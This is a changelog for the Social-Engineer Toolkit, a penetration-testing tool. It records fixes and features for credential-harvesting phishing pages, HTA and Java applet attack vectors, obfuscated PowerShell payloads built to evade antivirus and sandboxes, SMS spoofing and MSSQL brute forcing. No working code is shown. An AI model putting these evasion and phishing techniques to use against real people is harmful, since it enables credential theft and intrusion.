/
CHANGELOG
2911 lines (2484 loc) · 194 KB
/
CHANGELOG
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
~~~~~~~~~~~~~~~~
version 8.0.1
~~~~~~~~~~~~~~~~
* fix an issue when using import on web clone
* fix an issue when using hta attack vector would just put you out to main menu
~~~~~~~~~~~~~~~~
version 8.0
~~~~~~~~~~~~~~~~
* fix an issue that caused metasploit web server to not properly work with apache_server to off
* changed arduino powershell shellcode to https instead of http
* fixed bug that would not generate powershell encoded code when using arduino
* fixed a sudo check for SET when not running as root would cause a log error exception
* removed setup.py in favor of requirements.txt - no longer needed
* updated readme and install documentation to reflect new install procedures through requirements.txt
* updated copyright information to 2019
* removed irc channel, no longer active or used
* removed old sms phishing menu - spoofmytext never fixed their API and no longer supported
* removed full screen attack - no longer supported or maintained
* removed html generation from web attack, no longer supported
~~~~~~~~~~~~~~~~
version 7.7.9
~~~~~~~~~~~~~~~~
* fix source.js not copying over when using tabnabbing
* bump config version and add default apache dir to /var/www/html
* fix sendmail not found on OSX when using phishing emails
~~~~~~~~~~~~~~~~
version 7.7.8
~~~~~~~~~~~~~~~~
* fix ident issue on harvester throwing templates off
~~~~~~~~~~~~~~~~
version 7.7.7
~~~~~~~~~~~~~~~~
* remove old test code
* add better wording for templates
* remove old templates yahoo and facebook
* add better descriptions for using NAT/External IP addresses for credential harvester
* fix if a custom PDF is selected, it won't default to a blank pdf
* add user variable to harvester
~~~~~~~~~~~~~~~~
version 7.7.6
~~~~~~~~~~~~~~~~
* fix GOAT message when starting SSL server
* fix BaseServer not being identified in import
* fix OSX cloning for harvester (port allocation)
* fix web server from not closing properly when using java applet attack
~~~~~~~~~~~~~~~~
version 7.7.5
~~~~~~~~~~~~~~~~
* fix line split based on = on credential harvester
~~~~~~~~~~~~~~~~
version 7.7.4
~~~~~~~~~~~~~~~~
* fix code
~~~~~~~~~~~~~~~~
version 7.7.3
~~~~~~~~~~~~~~~~
* added better randomization of variable names for powershell payloads to evade detection
~~~~~~~~~~~~~~~~
version 7.7.2
~~~~~~~~~~~~~~~~
* fix endswith nonetype error
* fix directory traversal issue (thanks Spencer - awesome PR)
* add automatic IP detection for settings in credential harvester
~~~~~~~~~~~~~~~~
version 7.7.1
~~~~~~~~~~~~~~~~
* added nginx to service to stop on top of apache2
~~~~~~~~~~~~~~~~
version 7.7
~~~~~~~~~~~~~~~~
* rewrote grab_ipaddress() function to be a centralized routine that incorporates hostnames or IP addresses.
* rewrote grab_ipaddress() to include automatic detection of ipaddress or failover to manual entry. This will allow easier selection fo IP addresses without having to drop into a different window
* add hostname support for hta attack vector
* removed deploy binaries as a default option in the set.config file
* added ability for new menu for java applet that now allows you to specify multiple commands - useful if you want to insert things like empire payloads, etc.
* rewrote java applet to have additional functionality for multiple command menu
* better handling on command output
* fixed custom applet from not working properly
* fixed custom executable from not working properly
* added new unsigned obfsucated jar file
* added Java.java source files for customization
* added new Java Applet self-signed with new expirations
~~~~~~~~~~~~~~~~
version 7.6.5
~~~~~~~~~~~~~~~~
* added new chrome user agent in config - config will automatically update
~~~~~~~~~~~~~~~~
version 7.6.4
~~~~~~~~~~~~~~~~
* fix an issue where encoding messed up sql commands for mssql bruter attack vector in fasttrack
~~~~~~~~~~~~~~~~
version 7.6.3
~~~~~~~~~~~~~~~~
* fixed PEM import zipimporter error message - was more of a warning, supressed if not using pyopenssl
* fixed a harvester not found exception in harvester
* fixed powershell teensy conversion error when printing output
~~~~~~~~~~~~~~~~
7.6.2
~~~~~~~~~~~~~~~~
* code cleanup on arduino (PR)
* fixed an issue in spear phishing that would hold payload generation into a constant loop
~~~~~~~~~~~~~~~~
version 7.6.1
~~~~~~~~~~~~~~~~
* fixed old legacy php5 depend in setup.py
* fixed a print_status error if pyopenssl wasnt loaded
~~~~~~~~~~~~~~~~
version 7.6
~~~~~~~~~~~~~~~~
* changed generate_random_string to be alpha only - no numeric - conflicts with latest encoding techniques and not needed to introduce numbers
* changed the hta attack vector to incorporate strong obfuscation
* fixed the HTA attack vector to include the new method for toString properly
* added new obfuscation into new encodedcommand function within multiple modules
* added new java applet to fix expired timeframe
* removed spoofmytextmessages as it is no longer working properly - will be added when service is fixed
* added latest airbase-ng to the repository to fix openssl issues
~~~~~~~~~~~~~~~~
version 7.5.1
~~~~~~~~~~~~~~~~
* moved config file to be the first identifier for metasploit config file then move onto other methods. Possible for conflicts to override
* fixed indent with pep8 formatting
~~~~~~~~~~~~~~~~
version 7.5
~~~~~~~~~~~~~~~~
* updated config to turn apache_server default from on to off. can switch this under /etc/setoolkit/set.config to on if you want apache.
* wrote centralized function for new powershell encodedcommand obfsucation
* added encodedcommand to java applet
* added encodedcommand to hta attack vector
* added encodedcommand to teensy
* added encodedcommand to all modules with powershell injection
* remove sms modules templates that were no longer used
* added routes to help with spoofing - default is auto
~~~~~~~~~~~~~~~~
version 7.4.5
~~~~~~~~~~~~~~~~
* update fasttrack wordlist (git suggestion)
* updated teensy codebase thanks to mikecjudge
~~~~~~~~~~~~~~~~
version 7.4.4
~~~~~~~~~~~~~~~~
* fixed /usr/bin/msfconsole not showing appropriate metasploit path
* fixed using hostname in powershell injector (when using http/https) payloads
* added better handling around import methods in sms spoofing and break out error messages
* change the api to python source for sms spoofing
~~~~~~~~~~~~~~~~
version 7.4.3
~~~~~~~~~~~~~~~~
* add a patch to pyopenssl through zipimporter - looks like a bug in pyopenssl when paths are specified
~~~~~~~~~~~~~~~~
version 7.4.2
~~~~~~~~~~~~~~~~
* define function meta_path() better
* fixed a bug in binary2teensy that would not properly identify metasploit if launcher is in /usr/bin/msfconsole
* fixed a bug in binary2teensy where it would not open the directory properly and make reports
~~~~~~~~~~~~~~~~
version 7.4.1
~~~~~~~~~~~~~~~~
* converted all powershell encodedcommand to abbreviated
~~~~~~~~~~~~~~~~
version 7.4
~~~~~~~~~~~~~~~~
* added better obfuscation around encodedcommand
* added new third party module google analytics attack: # https://github.com/ZonkSec/google-analytics-attack. Walkthrough here: http://www.zonksec.com/blog/social-engineering-google-analytics/
* converted alphanumeric shellcode to accept DNS names
* changed alphanumeric shellcode to reverse_https instead of reverse_tcp
* added prompt for TLS support in email phishing
* added fsociety new logo - much larger lol
* fixed issue that would cause java applet to not launch webserver
* fixed issue that would cause metasploit browser to not launch webserver
* replaced spawn.py with older version which did not do the full pytho3 conversion os.path.join breaks in python2
* fixed spawning issue within spawn.py that would cause meta path to not launch in certain circumstances
* fixed an issue that would cause pdf generation to not complete properly
* added link to SET user manual into readme on github
* fixed an issue that would cause HTA attack vector to not spawn reverse https payloads properly (size constraint)
~~~~~~~~~~~~~~~~
version 7.3.16
~~~~~~~~~~~~~~~~
* fixed a bug that caused seautomatic to not detect full path of toolkit when launching from within directory
* fixed a bug in seautomate that would not wait for commands to execute based on time delay when launching and causing it to not submit
* fixed an issue where python3 would not import urllib.request
* fixed an issue that would cause python2.7 not to work without wget installed
~~~~~~~~~~~~~~~~
version 7.3.15
~~~~~~~~~~~~~~~~
* fix repetative sqlport issue bug for non existent hosts
~~~~~~~~~~~~~~~~
version 7.3.14
~~~~~~~~~~~~~~~~
* fixed a delay change in mssql
~~~~~~~~~~~~~~~~
version 7.3.13
~~~~~~~~~~~~~~~~
* some versions of OpenSSL would throw a zipimporter error. 7.3.13 resolves this issue
~~~~~~~~~~~~~~~~
version 7.3.12
~~~~~~~~~~~~~~~~
* added prompt before brute forcing
* removed nmap depend and used standard sockets for tcp connect
* reduced connect time for mssql
* added warning when you are out of credits for sms spoof
~~~~~~~~~~~~~~~~
version 7.3.11
~~~~~~~~~~~~~~~~
* major rehaul on mssql bruter now supports threading support for all udp/1433 scans
* combined udp/1433 sweep/scan functions and simplified code
~~~~~~~~~~~~~~~~
version 7.3.10
~~~~~~~~~~~~~~~~
* added masking of password in sms
* fixed encoding issue with sms spoofing
~~~~~~~~~~~~~~~~
version 7.3.9
~~~~~~~~~~~~~~~~
* config cleanup
* fixed an issue when using psexec injection it would use reverse_tcp instead of reverse_https this was due to the set.config being used
~~~~~~~~~~~~~~~~
version 7.3.8
~~~~~~~~~~~~~~~~
* added encodedcommand to get around AV evasion
~~~~~~~~~~~~~~~~
version 7.3.7
~~~~~~~~~~~~~~~~
* replaced powershell prep with the old one - it broke almost all powershell injection in SET
* fixed an issue that would cause scanner to continue to scan even when port not discovered (function issue)
~~~~~~~~~~~~~~~~
version 7.3.6
~~~~~~~~~~~~~~~~
* fixed a bug around mssql bruter and code enhancement changes
~~~~~~~~~~~~~~~~
version 7.3.5
~~~~~~~~~~~~~~~~
* fixed an issue that would cause psexec fasttrack to not properly work based on with open
~~~~~~~~~~~~~~~~
version 7.3.4
~~~~~~~~~~~~~~~~
* fixed an issue with mssql bruter that would cause it to fail over to nmap scans even if host wasn't valid
* fixed an issue that would cause UDP to not work properly when scanning subnet ranges
* improved handling and descriptions in mssql
* fixed error in mssql bruter error handling exception
* fixed an issue that would cause TDS to error out when directly connecting to MSSQL server
* removed impacket TDS from src.core and added impacket.tds
* updated requirements.txt for impacket
* fixed a bug when using certutil method and pairing directory strings
* fixed automatic brute on mssql server when single host was scanned
* fixed spacing issue on msfconsole -r was set to msfconsole-r
~~~~~~~~~~~~~~~~
version 7.3.3
~~~~~~~~~~~~~~~~
* code audit and cleanup (much appreciated Cabalist)
* fixed set.options error if file isnt found
~~~~~~~~~~~~~~~~
version 7.3.2
~~~~~~~~~~~~~~~~
* fixed an issue if python-requests was not installed it would bomb the module and SET out
~~~~~~~~~~~~~~~~
version 7.3.1
~~~~~~~~~~~~~~~~
* PR for better python3 and pep8 handling - (thanks Cabalist)
* added better handling around SMS spoofing and if legacy version of openssl is around
* updated requirements.txt
* added setdir definition from setdir to core.setdir on setoolkit
* removed old version of Signed_update.jar.orig, updated .gitignore to include .jar, and removed old version of unsigned.jar
~~~~~~~~~~~~~~~~
version 7.3
~~~~~~~~~~~~~~~~
* completely rewrote the SMS spoofing module from scratch to use spoofmytextmessage.com which the folks over there are super helpful and provided an undocumented API to be used within SET. This now works great and has been extensively tested.
* sped up the load process when using the main menu system the loading would pull from github each time the show_banner() function was called - this only loads once per SET load now
* fixed a string integer error from input to raw_input in the RDP DOS use after free in exploits
* added libapache2-mod-php to setup.py - needed for credential harvester
* added python-requests to setup.py - needed for sms spoofing
* added better check for python-requests in sms spoofing
* added better formating within sms spoofing
* added error handling to sms spoofing if something goes wrong during auth process
* removed socket error when no internet connection using update check
* use global lock for checking previous use on update
* general cleanup of setcore
* cleaned up setup file and added better descriptions
* fixed a bug that would cause fsattack to not load properly
* moved from pulling entire setcore which is a few thousand lines to adding src/core/set.version which contains the version - much faster in pulling down
* fixed a bug in dell drac that caused it to error out
* added timeout delay for pulling new version biggest challenge here is that urllib base is socket and socket timeout is tied to gethostbyname() which does not support a timeout, needed to add multiprocessing poll for 8 seconds to add timeout delay when checking for updates
* added check for urllib for python2 and python3 compatibility
* changed delldrac to python 2 to 3 compatibility and rewrote requests to use solid urlopen instead of requests
* added keyboard exception handling for urllib pull for version
~~~~~~~~~~~~~~~~
version 7.2.3
~~~~~~~~~~~~~~~~
* added better handling around powershell detection
~~~~~~~~~~~~~~~~
version 7.2.2
~~~~~~~~~~~~~~~~
* added fsociety banner to initial loading
~~~~~~~~~~~~~~~~
version 7.2.1
~~~~~~~~~~~~~~~~
* fix automatic update line replace bug
~~~~~~~~~~~~~~~~
version 7.2
~~~~~~~~~~~~~~~~
* fixed an issue on installer not copying SET directory properly (why was I moving a file and ... nevermind.)
* changed delay time for HTA attack vector from 3 seconds to 10 seconds to allow proper loading
* added wording when using gmail and application specific passwords
* rewrote ms08-067 instead of being the python exploit to use the metasploit default which is much more reliable
* re-introduced the SMS spoofing method (now option 10) - it has been optimized and reduced to only use SMSGang as a main provider.
* added ability to add your own attachments via file format attacks instead of having to use the ones built in
* added ability to add your own attachments via mass mailer attack vector
* added new config option called wget_deep and incremented config to 7.2 - this will allow 1 deep download wgets
* added ability to select on deeper wgets through web cloner in the web attack vectors - this will allow you to clone the site and not just the index.html which might be better.. to enable this edit /etc/setoolkit/set.config and turn WGET_DEEP to on.
* added a new check upon startup (which may delay the start of set for a couple seconds, but it will check to see if there is a new version of SET available for you automatically - this is displayed on the main launcher UI when you first start SET
* fixed setup.py a bit to reflect more on whats out there.. I may convert this to a standard setup installer eventually
* updated the licensing agreement - should check it out =)
* changed the default payload in HTA and Java Applet attack to be reverse_https instead of reverse_tcp (although both can be specified)
* number of fixes around spacing for python3 and python3 compatibility (urllib)
* removed string decode on HTA attack vector which is no longer needed in python3 (and python2)
* changed urllib2 to import urllib instead for python2 and python3 compatibility in setcore
* changed encoding techniques to bytes instead of strings for python3 compatibility
~~~~~~~~~~~~~~~~
version 7.1.2
~~~~~~~~~~~~~~~~
* fixed an issue on pdf generation payloads when metasploit had never been run before on a system - now forces directory creation
~~~~~~~~~~~~~~~~
version 7.1.1
~~~~~~~~~~~~~~~~
* fixes an issue when generating PDF exes that would cause an outfile error
~~~~~~~~~~~~~~~~
version 7.1
~~~~~~~~~~~~~~~~
* added so you can use multiple IP addreses based on space on mssql bruter
* rewrote mssql bruter to incorporate pymssql
* rewrote delivery payload method to use certuil instead of windows debug method
* added better description around handling tabnabbing
* added better ability to handle powershell injection
* rewrote and moved off impacket to pymssql
* added import own binary for mssql deployment
* changed deployment method from old base64 conversion bypass to Matthew Graeber's certutil binary method
* added option to import new file or metasploit file for meterpreter bypass method
* added better handling around binary injection technique for binary dropper method
* added better threading within brute forcing sql accounts
* fixed an issue where SET directory would not properly fill in dll hijacking and give invalid /root/.setsrc path instead of .set/src
* reduced file format generation counter to when it prompts error message
* fixed an issue in mssql bruter that would remove the port parameter when attempting to brute force
* added if udp 1434 is not found, it will fall back to nmap to discover if 1433 default port is open - ran into pentest where udp wasn't allowed and missed SQL servers because of this
* added better handling and description of the SQL servers found during the test - might be useful for pentests to store that data somewhere
* added more improvements and handling around MSSQL server
* added latest version of ridenum to fasttrack
* changed rid_enum.py to ridenum.py to be consistent with naming schema
~~~~~~~~~~~~~~~~
version 7.0.6
~~~~~~~~~~~~~~~~
* fix an issue that caused tabnabbing to fail
~~~~~~~~~~~~~~~~
version 7.0.5
~~~~~~~~~~~~~~~~
* switched psexec powershell injection to reverse_https
* switched mssql payload injection to reverse_https
~~~~~~~~~~~~~~~~
version 7.0.4
~~~~~~~~~~~~~~~~
* fixed an issue with tds not working on mssql with powershell injection
* fixed an issue that would cause payload generation to continue generating and never close
* added powershell obfuscation for all attack vectors =)
~~~~~~~~~~~~~~~~
version 7.0.3
~~~~~~~~~~~~~~~~
* fixed a python3 format issue in tail
* removed bleeding edge check since they should be in rolling now (thanks L1ghtn1ng)
~~~~~~~~~~~~~~~~
version 7.0.2
~~~~~~~~~~~~~~~~
* added a capture recorder within SET so that you don't need to exit when using credential harvester with Apache specified. Can still exit whenever you want and will still be under your apache root directory, but this way - everything is self contained within SET itself.
* added disclaimer for if php files were rendered as text - means proper php plugins are not installed
* multiple fixes for urllib.imports for python2/3 compatibility
~~~~~~~~~~~~~~~~
version 7.0.1
~~~~~~~~~~~~~~~~
* fixed an issue where harvester would error out when using python2 - worked fine in python3 - added backwards compatibility
* fixed an issue that would cause the IP address to not update when selecting credential harvester and cause a double prompt
~~~~~~~~~~~~~~~~
version 7.0
~~~~~~~~~~~~~~~~
* fixed an issue that would cause payload creation to halt if .msf5 was a path instead of .msf4
* fixed an issue when reimporting modules or re-selecting options that would cause it to not work properly
* updated config option to use most recent user agent string
* massive re-haul for pep8
* massive re-haul for python3
* added more words to mssql wordlist
* major refactoring of python codebase to support both python2 and python3
* restructured HTA attack vector and improved codebase to redirect after 3 seconds to the legitimate website while still launching the HTA file, this makes it very easy to coax victim into beleiving the HTA they are running is from a legitimate link
* rewrote alphanumeric shellcode injector to be python3 compliant and optimized
* added module_rewrite function instead of reload() for python3
* added Metasploit MS15-100 Microsoft Windows Media Center MCL Vulnerability to fileformat attacks
* added Fedora automatic install thanks to whoismath PR
~~~~~~~~~~~~~~~~
version 6.5.9
~~~~~~~~~~~~~~~~
* fixed a bug that was causing credential harvester to fail
~~~~~~~~~~~~~~~~
version 6.5.8
~~~~~~~~~~~~~~~~
* fixed an issue that would write out .setindex.html instead of copying to .set/index.html.
* fixed an issue that would cause harvester log to not properly write out on certain systems.
* fixed an issue that would cause the harvester log file to not write if path was /var/www/html
* added to automatically check if Kali is in use - removes the old install and git clones in order to keep SET up to date
* removed automatic SET update and put a warning that SET will be out of date using Kali-current vs bleeding edge
~~~~~~~~~~~~~~~~
version 6.5.7
~~~~~~~~~~~~~~~~
* fix chown issue on different platforms when using harvester (pull request)
* fixed an issue when moving to /etc/setoolkit/set.config would throw exception when using teensy attack vectors, now fixed
* fixed an issue which would cause msf.exe to not be found when using dll hijacking
~~~~~~~~~~~~~~~~
version 6.5.6
~~~~~~~~~~~~~~~~
* fixed solo payload generation where listener would not launch properly
~~~~~~~~~~~~~~~~
version 6.5.5
~~~~~~~~~~~~~~~~
* fixed automatic payload creation on pdf template where on Kali it would hang on waiting for payload
~~~~~~~~~~~~~~~~
version 6.5.4
~~~~~~~~~~~~~~~~
* fixed pdf template creation when using file format attack vector on option number one - was due to msfcli being removed - converted over to msfconsole
* fixed using infectious media generator using pdf template
* added automatic detection of /var/www/html or /var/www
* added automatic path selection when using config file
~~~~~~~~~~~~~~~~
version 6.5.3
~~~~~~~~~~~~~~~~
* added automatic path detection for metasploit in SET and PTF
~~~~~~~~~~~~~~~~
version 6.5.2
~~~~~~~~~~~~~~~~
* added smallest payload option for msfvenom shellcode creation
* added automatic start of apache on hta attack
* fixed powershell teensy deployment
~~~~~~~~~~~~~~~~
version 6.5.1
~~~~~~~~~~~~~~~~
* changed meta_path to pull blank path when using Kali linux
* changed msfvenom and msfconsole launching
* added better check for fasttrack
~~~~~~~~~~~~~~~~
version 6.5
~~~~~~~~~~~~~~~~
* added brand new attack vector HTA attack and incorporated powershell injection into it
* fixed a prompt that would cause double IP questions in certain attack vectors
* slimmed down powershell injection http/https attack vectors in order to use in payload delivery
* added exploit to browser attack Adobe Flash Player ByteArray Use After Free (2015-07-06)
* added exploit to browser attack Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow (2015-06-23)
* added exploit to browser attack Adobe Flash Player Drawing Fill Shader Memory Corruption (2015-05-12)
~~~~~~~~~~~~~~~~
version 6.4.1
~~~~~~~~~~~~~~~~
* fixed config related issue in seautomate, seupdate, and msf payload generation
* fixed an issue causing src to be undefined in infectious media generator
~~~~~~~~~~~~~~~~
version 6.4
~~~~~~~~~~~~~~~~
* fixed an issue that would cause 32-bit powershell injection from possibly not working
* fixed an issue that would cause payloads to not fire when powershell injection occurs
* restructured how bleeding edge is written initially and no longer overwrite sources.list
* removed slim_set, was used for pwnie way back and is no longer needed
* cleaned up an old mailing_list.txt format that is no longer needed
* rehauled the config directories, no longer is there a config/ directory within the SET root directory, it is now under /etc/setoolkit/set.config
* added dynamic import updates to /etc/setoolkit
* factored config changes from git pull request to fix grammar and formatting
* slimmed down powershell injection code by 32 bytes
* reworked config imports from harvester and cloner for the new config format
* rewrote portions of powershell injection to incorporate and handle reverse_http and reverse_https
* slimmed down powershell injection code more, and give two flag variables to shave shellcode off in order to support http/https payloads
* fixed an import config error issue when using web harvester
~~~~~~~~~~~~~~~~
version 6.3.2
~~~~~~~~~~~~~~~~
* rewrote pyinjector and multipyinjector to evade sandbox technologies
* added user + kernel debugger detection and automatic termination of payloads
* bundled binaries in virtual machine containers for added detection resilience
~~~~~~~~~~~~~~~~
version 6.3.1
~~~~~~~~~~~~~~~~
* rewrote the solo payload generation into its own payload delivery that piggy backs the existing menu system
* fixed an issue when creating the payload and listener options (option 6) would specify src was not found - this was due to a code cleanup project from versoin 6.3
* rewrote the autorun to function accordingly with new solo
* optimized and rewrote code base for payload creation - eliminated lots of old lines of code
* rewrote autorun code and optimized to leverage solo and slimmed down code base
* fixed an issue that would cause autorun to not work when relaunching
* fixed an issue that would cause browser autopwn to use the old program_junk folder vs. /root/.set/ folder data
* added \r\n\r\n returns to all msfconsoles - people get confused without having that extra enter in place thinking msfconsole is broke
* added \r\n\r\n to all meta_config generations when using msfconsole -r for resource files
~~~~~~~~~~~~~~~~
version 6.3
~~~~~~~~~~~~~~~~
* removed old payloads that were no longer needed - pyinjector and multipyinjector to the job, standard meterpreter payloads all get picked up regardless of encoding
* fixed an issue causing PDF templates from not being properly created when selecting solo
* added ability for custom exe to properly execute when deploy binaries is still specified to OFF (it has to)
* rewrote java applet to incorporate custom binary selection
* added check to deploy binaries to auto select yes parameter 8 automatically
* removed disitools from SET - no longer needed in custom binary
* removed legit binary, no longer needed
* removed three config options no longer needed
* defaulted the memory injection technique as the main method for old payloads
* added additional obfuscation around AES generation and making sure static sigs cant hit it
* stablized MSSQL bruter and injection through powershell
* fixed webjacking that would cause the menu to bomb out if invalid responses
* fixed an issue when importing a custom payload, it would try to kick off a listener which it shouldnt
* added additional wording about when specifying a custom payload that you will need to create your own listener
* added flag replacement variable for param name 8 which will indicate a randomized four alphanumeric for custom payload delivery - this will allow custom payloads to function properly without triggering powershell or other exploitation methods
* added the ability for powershell to execute first and if successful then not drop binary stager as last resort
* added a workaround for a metasploit bug that would cause bundle install issues when launching directly within the /opt/metasploit/apps/pro/msf3 directory or within the /usr/share/ framework directory. I first check for /usr/bin/msfconsole first and if there I do not append to the path variable in order to launch from anywhere
* added ability to use default msfconsole launcher if applicable from any path instead of from home directory - fixed in psexec, powershell injection, java applet, custom payloads, etc.
* randomized custom parameter name when deploying custom binaries to throw off static signatures
~~~~~~~~~~~~~~~~
version 6.2
~~~~~~~~~~~~~~~~
* changed IP address for the payload listener to specify LHOST
* included TDS as a standard impacket library
* added port to MSSQL display when compromising system
* moved create_payloads in payloadgen to be compliant with msfvenom creation and moved off msfpayload and msfencode
* fixed multiple files still using msfpayload or msfvenom
* fixed a bug that caused a tds exceptions error when using the SQL attack (missing tds library)
* updated specific wording in setoolkit launcher
* slimmed powershell injection code to reduce injection code by about 17 bytes
* completely randomized the java applet to the point where it will randomize the name, no longer uses Signed_Update.jar - there were signatures floating around that were detecting it based on static names
* randomized and obfuscated pyinjector code base and locked into its own virtual container and debugger protection
* randomized and obfuscated multi pyinjector code base and locked into its own virtual container and debugger protection
* added the java applet to now smart detect if powershell is installed, if it is then it will not download an executable which could be used on detection capabilities. Powershell is plenty stable and should not require any deviations for a binary to be downloaded.
* added ability to check if certain paths are legitimate, if they are will deploy payloads via java applet
* full msfvenom support and conversion off msfpayload msfencode
* removed old call for impacket tds compatibility
~~~~~~~~~~~~~~~~
version 6.1.2
~~~~~~~~~~~~~~~~
* fixed powershell injection where payload would not properly generate when using pyinjector
* fixed menu option error when using multi-attack vector
~~~~~~~~~~~~~~~~
version 6.1.1
~~~~~~~~~~~~~~~~
* removed bleeding edge as a default option when launchin SET - it has since been moved into config/set_config and can be turned on by switching BLEEDING_EDGE to on. Use at your own risk - it can break stuff
~~~~~~~~~~~~~~~~
version 6.1
~~~~~~~~~~~~~~~~
* fixed a bug that would throw a directory already created exception when using shellcode injection for Arduino
* fixed a bug when reverse_http/https was specified under powershell prep, it would not properly handle patching IP address or port
* fixed a bug where TDS would not be recognized as installed on updated impacket systems
* removed disable database support on psexec
~~~~~~~~~~~~~~~~
version 6.0.5
~~~~~~~~~~~~~~~~
* fixed an issue with fasttrack built-in attack with RIDENUM - would not properly close built in brute force file causing an exception
* converted powershell injection to use -win hidden instead of -win hid, for some reason some versions of Windows get mad and don't execute the code properly
* fixed powershell injection in mssql bruter
* added better upper/lower handling in options in mssql bruter
* fixed an issue causing timing issues in mssql bruter powershell injection technique
~~~~~~~~~~~~~~~~
version 6.0.4
~~~~~~~~~~~~~~~~
* fixed an issue that would cause credential harvester, tabnabbing, and webjacking to not properly redirect after successful credential nab
~~~~~~~~~~~~~~~~
version 6.0.3
~~~~~~~~~~~~~~~~
* added a check in for twitter logins - they are doing client-side validation if root isn't twitter.com - added a rename on function variables to get around the password field not being allowed to be entered
~~~~~~~~~~~~~~~~
version 6.0.2
~~~~~~~~~~~~~~~~
* changed powershell injection technique to not exitonsession when creating the metasploit.rc file when specified in the powershell menu, this was already enabled when using psexec or other methods
* shrunk the powershell injection code command, not as much length needed - useful for shorter payloads
* slimmed down actual encoded powershell injection code, removed un-used code from the central powershell routine
* fixed a few typos and alignment on licensing agreement within SET and minor silly modifications to license
* fixed coloring when exiting and alignment for purpose of good disclaimer
* added print_status to bleeding edge tracking
* fixed unresponsive powershell injection when uses windows 8
* changed java applet user agent string inside applet to evade java blockers
* removed old ID and value parameters from the Java Applet database, no longer used based on changes through Java 7 update 42 - SET now uses manifest files
* fixed unsigned.py moving to unsigned libraries
* rehauled downloader inside java applet
~~~~~~~~~~~~~~~~
version 6.0.1
~~~~~~~~~~~~~~~~
* fixed menu system to remove sms spoofing (no longer supported)
* redesigned powershell injection to be much more efficient
* removed time delays in powershell injection, instead use pexpect expect() to wait for listener to start
* added option to fall back to old method if powershell injection fails (option menu)
* start msf listener first, wait for msf to launch, then trigger vulnerability
* threaded the powershell injection command through mssql
* updated wordlist to include a couple more wordlists found in the wild
~~~~~~~~~~~~~~~~
version 6.0
~~~~~~~~~~~~~~~~
* fixed psexec which would only bring one shell back instead of as many as you used for the host
* fixed an issue that would cause metasploit payloads to not be properly generated when using msfvenom, this was due to a code change requiring -f <codetype>
* on the update SET menu, it will automatically check if Kali Linux is installed, if it is will automatically enable bleeding edge repos for daily updates to SET
* added SET to automatically do apt-get update/upgrade/dist-upgrade/autoremove upon checking for updates if using Kali
* fixed an issue that would cause the MSSQL bruter to throw a payload_options error when powershell was detected, this was due to a file not being written out for payloads.powershell.prep to function properly
* updated dell drac attack to remove old working and twitter handle
* upgraded downgrade attack for powershell to server 2008/2012 compatiblity
